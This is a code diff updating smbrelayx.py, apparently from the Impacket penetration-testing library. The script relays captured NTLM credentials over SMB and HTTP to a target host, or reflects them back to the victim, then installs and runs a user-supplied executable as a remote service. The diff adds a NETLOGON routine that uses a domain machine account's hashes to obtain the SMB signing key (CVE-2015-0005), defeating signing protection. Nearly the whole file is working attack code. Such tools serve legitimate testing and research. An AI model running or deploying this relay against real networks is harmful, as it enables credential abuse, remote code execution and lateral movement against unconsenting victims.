@@ -1,30 +1,36 @@
 #!/usr/bin/python
-# Copyright (c) 2013 CORE Security Technologies
+# Copyright (c) 2013-2015 CORE Security Technologies
 #
 # This software is provided under under a slightly modified version
 # of the Apache Software License. See the accompanying LICENSE file
 # for more information.
 #
-# $Id: smbrelayx.py 1214 2014-04-16 17:57:44Z bethus@gmail.com $
-#
 # SMB Relay Module
 #
 # Author:
-#  Alberto Solino
+#  Alberto Solino (@agsolino)
 #
 # Description:
-#             This module performs the SMB Relay attacks originally discovered by cDc. It receives a 
-# list of targets and for every connection received it will choose the next target and try to relay the
-# credentials. Also, if specified, it will first to try authenticate against the client connecting to us.
+#             This module performs the SMB Relay attacks originally discovered
+# by cDc. It receives a list of targets and for every connection received it 
+# will choose the next target and try to relay the credentials. Also, if
+# specified, it will first to try authenticate against the client connecting 
+# to us.
 # 
-# It is implemented by invoking a SMB and HTTP Server, hooking to a few functions and then using the smbclient
-# portion. It is supposed to be working on any LM Compatibility level. The only way to stop this attack 
+# It is implemented by invoking a SMB and HTTP Server, hooking to a few 
+# functions and then using the smbclient portion. It is supposed to be 
+# working on any LM Compatibility level. The only way to stop this attack 
 # is to enforce on the server SPN checks and or signing.
+# 
+# If the target system is enforcing signing and a machine account was provided, 
+# the module will try to gather the SMB session key through 
+# NETLOGON (CVE-2015-0005)
 #
-# If the authentication against the targets succeed, the client authentication success as well and 
-# a valid connection is set against the local smbserver. It's up to the user to set up the local
-# smbserver functionality. One option is to set up shares with whatever files you want to the victim
-# thinks it's connected to a valid SMB server. All that is done through the smb.conf file or 
+# If the authentication against the targets succeed, the client authentication 
+# success as well and a valid connection is set against the local smbserver. 
+# It's up to the user to set up the local smbserver functionality. One option 
+# is to set up shares with whatever files you want to the victim thinks it's 
+# connected to a valid SMB server. All that is done through the smb.conf file or 
 # programmatically.
 #
 
@@ -38,43 +44,50 @@ import time
 import argparse
 import SimpleHTTPServer
 import SocketServer
+import logging
 import base64
 
-from impacket import smbserver, smb, ntlm, dcerpc, version
-from impacket.dcerpc import dcerpc, transport, srvsvc, svcctl
-from impacket.examples import serviceinstall
+from impacket import smbserver, smb, ntlm, version
+from impacket.examples import serviceinstall, logger
 from impacket.spnego import *
 from impacket.smb import *
 from impacket.smbserver import *
+from impacket.dcerpc.v5 import transport
+from impacket.dcerpc.v5 import epm, nrpc
+from impacket.dcerpc.v5.ndr import NULL
+
 
 from threading import Thread
 
-
+try:
+ from Crypto.Cipher import DES, AES, ARC4
+except Exception:
+    logging.critical("Warning: You don't have any crypto installed. You need PyCrypto")
+    logging.critical("See http://www.pycrypto.org/")
 
 class doAttack(Thread):
     def __init__(self, SMBClient, exeFile):
         Thread.__init__(self)
         self.installService = serviceinstall.ServiceInstall(SMBClient, exeFile)
-        
 
     def run(self):
         # Here PUT YOUR CODE!
-        # First of all check whether we're Guest in the target system.
-        # If so, we're screwed.
         result = self.installService.install()
         if result is True:
-            print "[*] Service Installed.. CONNECT!"
+            logging.info("Service Installed.. CONNECT!")
             self.installService.uninstall()
 
 class SMBClient(smb.SMB):
     def __init__(self, remote_name, extended_security = True, sess_port = 445):
         self._extendedSecurity = extended_security
+        self.domainIp = None
+        self.machineAccount = None
+        self.machineHashes = None
+
         smb.SMB.__init__(self,remote_name, remote_name, sess_port = sess_port)
 
     def neg_session(self):
         neg_sess = smb.SMB.neg_session(self, extended_security = self._extendedSecurity)
-        if self._SignatureRequired is True:
-            print "[!] Signature is REQUIRED on the other end, can't attack target"
         return neg_sess
 
     def setUid(self,uid):
@@ -110,13 +123,129 @@ class SMBClient(smb.SMB):
         try:
             smb.isValidAnswer(SMB.SMB_COM_SESSION_SETUP_ANDX)
         except:
-            print "[!] Error login_standard"
+            logging.error("Error login_standard")
             return None, STATUS_LOGON_FAILURE
         else:
             self._uid = smb['Uid']
             return smb, STATUS_SUCCESS
 
-    def sendAuth(self, authenticateMessageBlob):
+    def setDomainAccount( self, machineAccount,  machineHashes, domainIp):
+        self.machineAccount = machineAccount
+        self.machineHashes = machineHashes
+        self.domainIp = domainIp
+        if self._SignatureRequired is True:
+            if self.domainIp is None:
+                logging.error("Signature is REQUIRED on the other end, attack will not work")
+            else:
+                logging.info("Signature is REQUIRED on the other end, using NETLOGON approach")
+
+
+    def netlogonSessionKey(self, challenge, authenticateMessageBlob):
+        # Here we will use netlogon to get the signing session key
+        logging.info("Connecting to %s NETLOGON service" % self.domainIp)
+
+        respToken2 = SPNEGO_NegTokenResp(authenticateMessageBlob)
+        authenticateMessage = ntlm.NTLMAuthChallengeResponse()
+        authenticateMessage.fromString(respToken2['ResponseToken'] )
+        _, machineAccount = self.machineAccount.split('/')
+        domainName = authenticateMessage['domain_name'].decode('utf-16le')
+
+        try:
+            av_pairs = authenticateMessage['ntlm'][44:]
+            av_pairs = ntlm.AV_PAIRS(av_pairs)
+
+            serverName = av_pairs[ntlm.NTLMSSP_AV_HOSTNAME][1].decode('utf-16le')
+        except:
+            # We're in NTLMv1, not supported
+            return STATUS_ACCESS_DENIED
+
+        stringBinding = r'ncacn_np:%s[\PIPE\netlogon]' % self.domainIp
+
+        rpctransport = transport.DCERPCTransportFactory(stringBinding)
+
+        if len(self.machineHashes) > 0:
+            lmhash, nthash = self.machineHashes.split(':')
+        else:
+            lmhash = ''
+            nthash = ''
+
+        if hasattr(rpctransport, 'set_credentials'):
+            # This method exists only for selected protocol sequences.
+            rpctransport.set_credentials(machineAccount,'', domainName, lmhash, nthash)
+
+        dce = rpctransport.get_dce_rpc()
+        dce.connect()
+        dce.bind(nrpc.MSRPC_UUID_NRPC)
+        resp = nrpc.hNetrServerReqChallenge(dce, NULL, serverName+'\x00', '12345678')
+
+        serverChallenge = resp['ServerChallenge']
+
+        if self.machineHashes == '':
+            ntHash = None
+        else:
+            ntHash = self.machineHashes.split(':')[1].decode('hex')
+
+        sessionKey = nrpc.ComputeSessionKeyStrongKey('', '12345678', serverChallenge, ntHash)
+
+        ppp = nrpc.ComputeNetlogonCredential('12345678', sessionKey)
+
+        resp = nrpc.hNetrServerAuthenticate3(dce, NULL, machineAccount + '\x00', nrpc.NETLOGON_SECURE_CHANNEL_TYPE.WorkstationSecureChannel, serverName+'\x00',ppp, 0x600FFFFF )
+
+        clientStoredCredential = pack('<Q', unpack('<Q',ppp)[0] + 10)
+
+        # Now let's try to verify the security blob against the PDC
+
+        request = nrpc.NetrLogonSamLogonWithFlags()
+        request['LogonServer'] = '\x00'
+        request['ComputerName'] = serverName + '\x00'
+        request['ValidationLevel'] = nrpc.NETLOGON_VALIDATION_INFO_CLASS.NetlogonValidationSamInfo4
+
+        request['LogonLevel'] = nrpc.NETLOGON_LOGON_INFO_CLASS.NetlogonNetworkTransitiveInformation
+        request['LogonInformation']['tag'] = nrpc.NETLOGON_LOGON_INFO_CLASS.NetlogonNetworkTransitiveInformation
+        request['LogonInformation']['LogonNetworkTransitive']['Identity']['LogonDomainName'] = domainName
+        request['LogonInformation']['LogonNetworkTransitive']['Identity']['ParameterControl'] = 0
+        request['LogonInformation']['LogonNetworkTransitive']['Identity']['UserName'] = authenticateMessage['user_name'].decode('utf-16le')
+        request['LogonInformation']['LogonNetworkTransitive']['Identity']['Workstation'] = ''
+        request['LogonInformation']['LogonNetworkTransitive']['LmChallenge'] = challenge
+        request['LogonInformation']['LogonNetworkTransitive']['NtChallengeResponse'] = authenticateMessage['ntlm']
+        request['LogonInformation']['LogonNetworkTransitive']['LmChallengeResponse'] = authenticateMessage['lanman']
+
+        authenticator = nrpc.NETLOGON_AUTHENTICATOR()
+        authenticator['Credential'] = nrpc.ComputeNetlogonCredential(clientStoredCredential, sessionKey)
+        authenticator['Timestamp'] = 10
+
+        request['Authenticator'] = authenticator
+        request['ReturnAuthenticator']['Credential'] = '\x00'*8
+        request['ReturnAuthenticator']['Timestamp'] = 0
+        request['ExtraFlags'] = 0
+        #request.dump()
+        try:
+            resp = dce.request(request)
+            #resp.dump()
+        except Exception, e:
+            #import traceback
+            #print traceback.print_exc()
+            logging.error(str(e))
+            return e.get_error_code()
+
+        logging.info("%s\\%s successfully validated through NETLOGON" % (domainName, authenticateMessage['user_name'].decode('utf-16le')))
+ 
+        encryptedSessionKey = authenticateMessage['session_key']
+        if encryptedSessionKey != '':
+            signingKey = ntlm.generateEncryptedSessionKey(resp['ValidationInformation']['ValidationSam4']['UserSessionKey'], encryptedSessionKey)
+        else:
+            signingKey = resp['ValidationInformation']['ValidationSam4']['UserSessionKey'] 
+
+        logging.info("SMB Signing key: %s " % signingKey.encode('hex'))
+
+        self.set_session_key(signingKey)
+
+        self._SignatureEnabled = True
+        self._SignSequenceNumber = 2
+        self.set_flags(flags1 = SMB.FLAGS1_PATHCASELESS, flags2 = SMB.FLAGS2_EXTENDED_SECURITY)
+        return STATUS_SUCCESS
+
+    def sendAuth(self, serverChallenge, authenticateMessageBlob):
         smb = NewSMBPacket()
         smb['Flags1'] = SMB.FLAGS1_PATHCASELESS
         smb['Flags2'] = SMB.FLAGS2_EXTENDED_SECURITY 
@@ -149,6 +278,14 @@ class SMBClient(smb.SMB):
         errorCode += smb['_reserved'] << 8
         errorCode += smb['ErrorClass']
 
+        if errorCode == STATUS_SUCCESS and self._SignatureRequired is True and self.domainIp is not None:
+            try:
+                errorCode = self.netlogonSessionKey(serverChallenge, authenticateMessageBlob)    
+            except:
+                #import traceback
+                #print traceback.print_exc()
+                raise
+
         return smb, errorCode
 
     def sendNegotiate(self, negotiateMessage):
@@ -194,7 +331,7 @@ class SMBClient(smb.SMB):
         try:
             smb.isValidAnswer(SMB.SMB_COM_SESSION_SETUP_ANDX)
         except:
-            print "[!] SessionSetup Error!"
+            logging.error("SessionSetup Error!")
             return None
         else:
             # We will need to use this uid field for all future requests/responses
@@ -216,13 +353,16 @@ class HTTPRelayServer(Thread):
             self.target = target
             self.exeFile = exeFile
             self.mode = mode
+            self.domainIp = None
+            self.machineAccount = None
+            self.machineHashes = None
             SocketServer.TCPServer.__init__(self,server_address, RequestHandlerClass)
 
     class HTTPHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
         def __init__(self,request, client_address, server):
             self.server = server
             self.protocol_version = 'HTTP/1.1'
-            print "[*] HTTPD: Received connection from %s, attacking target %s" % (client_address[0] ,self.server.target)
+            logging.info("HTTPD: Received connection from %s, attacking target %s" % (client_address[0] ,self.server.target))
             SimpleHTTPServer.SimpleHTTPRequestHandler.__init__(self,request, client_address, server)
 
         def handle_one_request(self):
@@ -264,7 +404,7 @@ class HTTPRelayServer(Thread):
             if messageType == 1:
                 if self.server.mode.upper() == 'REFLECTION':
                     self.target = self.client_address[0]
-                    print "[*] Downgrading to standard security"
+                    logging.info("Downgrading to standard security")
                     extSec = False
                 else:
                     self.target = self.server.target
@@ -272,12 +412,15 @@ class HTTPRelayServer(Thread):
 
                 try:
                     self.client = SMBClient(self.target, extended_security = True)
+                    self.client.setDomainAccount(self.machineAccount, self.machineHashes, self.domainIp)
                     self.client.set_timeout(60)
                 except Exception, e:
-                   print "[!] Connection against target %s FAILED" % self.target
-                   print e
+                   logging.error("Connection against target %s FAILED" % self.target)
+                   logging.error(str(e))
 
                 clientChallengeMessage = self.client.sendNegotiate(token) 
+                self.challengeMessage = ntlm.NTLMAuthChallenge()
+                self.challengeMessage.fromString(clientChallengeMessage)
                 self.do_AUTHHEAD(message = 'NTLM '+base64.b64encode(clientChallengeMessage))
             elif messageType == 3:
                 authenticateMessage = ntlm.NTLMAuthChallengeResponse()
@@ -285,17 +428,17 @@ class HTTPRelayServer(Thread):
                 if authenticateMessage['user_name'] != '':
                     respToken2 = SPNEGO_NegTokenResp()
                     respToken2['ResponseToken'] = str(token)
-                    clientResponse, errorCode = self.client.sendAuth(respToken2.getData())                
+                    clientResponse, errorCode = self.client.sendAuth(self.challengeMessage['challenge'], respToken2.getData())                
                 else:
                     # Anonymous login, send STATUS_ACCESS_DENIED so we force the client to send his credentials
                     errorCode = STATUS_ACCESS_DENIED
 
                 if errorCode != STATUS_SUCCESS:
-                    print "[!] Authenticating against %s as %s\%s FAILED" % (self.target,authenticateMessage['domain_name'], authenticateMessage['user_name'])
+                    logging.error("Authenticating against %s as %s\%s FAILED" % (self.target,authenticateMessage['domain_name'], authenticateMessage['user_name']))
                     self.do_AUTHHEAD('NTLM')
                 else:
                     # Relay worked, do whatever we want here...
-                    print "[*] Authenticating against %s as %s\%s SUCCEED" % (self.target,authenticateMessage['domain_name'], authenticateMessage['user_name'])
+                    logging.info("Authenticating against %s as %s\%s SUCCEED" % (self.target,authenticateMessage['domain_name'], authenticateMessage['user_name']))
 
                     clientThread = doAttack(self.client,self.server.exeFile)
                     clientThread.start()
@@ -320,8 +463,13 @@ class HTTPRelayServer(Thread):
     def setMode(self,mode):
         self.mode = mode
 
+    def setDomainAccount( self, machineAccount,  machineHashes, domainIp):
+        self.machineAccount = machineAccount
+        self.machineHashes = machineHashes
+        self.domainIp = domainIp
+
     def run(self):
-        print "[*] Setting up HTTP Server"
+        logging.info("Setting up HTTP Server")
         self.httpd = self.HTTPServer(("", 80), self.HTTPHandler, self.target, self.exeFile, self.mode)
         self.httpd.serve_forever()
 
@@ -332,6 +480,9 @@ class SMBRelayServer(Thread):
         self.server = 0
         self.target = '' 
         self.mode = 'REFLECTION'
+        self.domainIp = None
+        self.machineAccount = None
+        self.machineHashes = None
 
         # Here we write a mini config for the server
         smbConfig = ConfigParser.ConfigParser()
@@ -349,7 +500,7 @@ class SMBRelayServer(Thread):
         smbConfig.set('IPC$','share type','3')
         smbConfig.set('IPC$','path','')
 
-        self.server = smbserver.SMBSERVER(('0.0.0.0',445), config_parser = smbConfig)
+        self.server = SMBSERVER(('0.0.0.0',445), config_parser = smbConfig)
         self.server.processConfigFile()
 
         self.origSmbComNegotiate = self.server.hookSmbCommand(smb.SMB.SMB_COM_NEGOTIATE, self.SmbComNegotiate)
@@ -369,23 +520,24 @@ class SMBRelayServer(Thread):
             smbClient = smbData[self.target]['SMBClient']
             del(smbClient)
             del (smbData[self.target])
-        print "[*] SMBD: Received connection from %s, attacking target %s" % (connData['ClientIP'] ,self.target)
+        logging.info("SMBD: Received connection from %s, attacking target %s" % (connData['ClientIP'] ,self.target))
         try: 
             if recvPacket['Flags2'] & smb.SMB.FLAGS2_EXTENDED_SECURITY == 0:
                 extSec = False
             else:
                 if self.mode.upper() == 'REFLECTION':
                     # Force standard security when doing reflection
-                    print "[*] Downgrading to standard security"
+                    logging.info("Downgrading to standard security")
                     extSec = False
                     recvPacket['Flags2'] = recvPacket['Flags2'] & ( ~smb.SMB.FLAGS2_EXTENDED_SECURITY )
                 else:
                     extSec = True
             client = SMBClient(self.target, extended_security = extSec)
+            client.setDomainAccount(self.machineAccount, self.machineHashes, self.domainIp)
             client.set_timeout(60)
         except Exception, e:
-            print "[!] Connection against target %s FAILED" % self.target
-            print e
+            logging.error("Connection against target %s FAILED" % self.target)
+            logging.error(str(e))
         else: 
             encryptionKey = client.get_encryption_key()
             smbData[self.target] = {} 
@@ -476,7 +628,7 @@ class SMBRelayServer(Thread):
                 authenticateMessage = ntlm.NTLMAuthChallengeResponse()
                 authenticateMessage.fromString(token)
                 if authenticateMessage['user_name'] != '':
-                    clientResponse, errorCode = smbClient.sendAuth(sessionSetupData['SecurityBlob'])                
+                    clientResponse, errorCode = smbClient.sendAuth(connData['CHALLENGE_MESSAGE']['challenge'],sessionSetupData['SecurityBlob'])
                 else:
                     # Anonymous login, send STATUS_ACCESS_DENIED so we force the client to send his credentials
                     errorCode = STATUS_ACCESS_DENIED
@@ -496,12 +648,12 @@ class SMBRelayServer(Thread):
                     packet['ErrorClass']  = errorCode & 0xff
                     # Reset the UID
                     smbClient.setUid(0)
-                    print "[!] Authenticating against %s as %s\%s FAILED" % (self.target,authenticateMessage['domain_name'], authenticateMessage['user_name'])
+                    logging.error("Authenticating against %s as %s\%s FAILED" % (self.target,authenticateMessage['domain_name'], authenticateMessage['user_name']))
                     #del (smbData[self.target])
                     return None, [packet], errorCode
                 else:
                     # We have a session, create a thread and do whatever we want
-                    print "[*] Authenticating against %s as %s\%s SUCCEED" % (self.target,authenticateMessage['domain_name'], authenticateMessage['user_name'])
+                    logging.info("Authenticating against %s as %s\%s SUCCEED" % (self.target,authenticateMessage['domain_name'], authenticateMessage['user_name']))
                     del (smbData[self.target])
                     clientThread = doAttack(smbClient,self.exeFile)
                     clientThread.start()
@@ -595,7 +747,7 @@ class SMBRelayServer(Thread):
         self.server.serve_forever()
 
     def run(self):
-        print "[*] Setting up SMB Server"
+        logging.info("Setting up SMB Server")
         self._start()
 
     def setTargets(self, targets):
@@ -607,6 +759,11 @@ class SMBRelayServer(Thread):
     def setMode(self,mode):
         self.mode = mode
 
+    def setDomainAccount( self, machineAccount,  machineHashes, domainIp):
+        self.machineAccount = machineAccount
+        self.machineHashes = machineHashes
+        self.domainIp = domainIp
+
 # Process command-line arguments.
 if __name__ == '__main__':
 
@@ -616,6 +773,10 @@ if __name__ == '__main__':
     parser.add_argument("--help", action="help", help='show this help message and exit')
     parser.add_argument('-h', action='store', metavar = 'HOST', help='Host to relay the credentials to, if not it will relay it back to the client')
     parser.add_argument('-e', action='store', required=True, metavar = 'FILE', help='File to execute on the target system')
+    parser.add_argument('-machine-account', action='store', required=False, help='Domain machine account to use when interacting with the domain to grab a session key for signing, format is domain/machine_name')
+    parser.add_argument('-machine-hashes', action="store", metavar = "LMHASH:NTHASH", help='Domain machine hashes, format is LMHASH:NTHASH')
+    parser.add_argument('-domain', action="store", help='Domain FQDN or IP to connect using NETLOGON')
+
     if len(sys.argv)==1:
         parser.print_help()
         sys.exit(1)
@@ -623,15 +784,15 @@ if __name__ == '__main__':
     try:
        options = parser.parse_args()
     except Exception, e:
-       print e
+       logging.error(str(e))
        sys.exit(1)
 
     if options.h is not None:
-        print "[*] Running in relay mode"
+        logging.info("Running in relay mode")
         mode = 'RELAY'
         targetSystem = options.h
     else:
-        print "[*] Running in reflection mode"
+        logging.info("Running in reflection mode")
         targetSystem = None
         mode = 'REFLECTION'
 
@@ -642,10 +803,15 @@ if __name__ == '__main__':
         s.setTargets(targetSystem)
         s.setExeFile(exeFile)
         s.setMode(mode)
+        if options.machine_account is not None and options.machine_hashes is not None and options.domain is not None:
+            s.setDomainAccount( options.machine_account,  options.machine_hashes,  options.domain)
+        elif (options.machine_account is None and options.machine_hashes is None and options.domain is None) is False:
+            logging.error("You must specify machine-account/hashes/domain all together!")
+            sys.exit(1)
         s.start()
         
     print ""
-    print "[*] Servers started, waiting for connections"
+    logging.info("Servers started, waiting for connections")
     while True:
         try:
             sys.stdin.read()
@@ -653,3 +819,4 @@ if __name__ == '__main__':
             sys.exit(1)
         else:
             pass
+
